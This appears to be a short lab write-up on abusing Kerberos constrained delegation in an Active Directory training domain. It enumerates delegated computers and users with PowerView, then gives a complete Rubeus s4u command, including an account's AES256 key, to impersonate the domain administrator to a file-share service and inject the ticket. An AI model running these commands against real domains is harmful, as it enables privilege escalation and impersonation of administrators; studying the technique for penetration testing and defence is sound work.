Enumerating Constrained Delegation using PowerView

Get-DomainComputer -TrustedToAuth | select name

Untitled

We have the Admin SRV computer have Constrained Delegation

Let’s Check the users have Constrained Delegation

Get-DomainUser -TrustedToAuth | select name 

Untitled

As we see we have the websvc user have Constrained Delegation

Now let’s understand how it works

Untitled

If we compromised the user websvc we can access the file server (CIFS) as any user in the domain including Domain Admins

Now let’s use Rubeus to abuse the Constrained Delegation

.\\Rubeus.exe s4u /user:websvc /aes256:2d84a12f614ccbf3d716b8339cbbe1a650e5fb352edc8e879470ade07e5412d7 /impersonateuser:administrator /msdsspn:CIFS/dcorp-mssql.dollarcorp.moneycorp.LOCAL /nowrap /ptt

Untitled

Notice that we got a TGT as Administrator for the SPN CIFS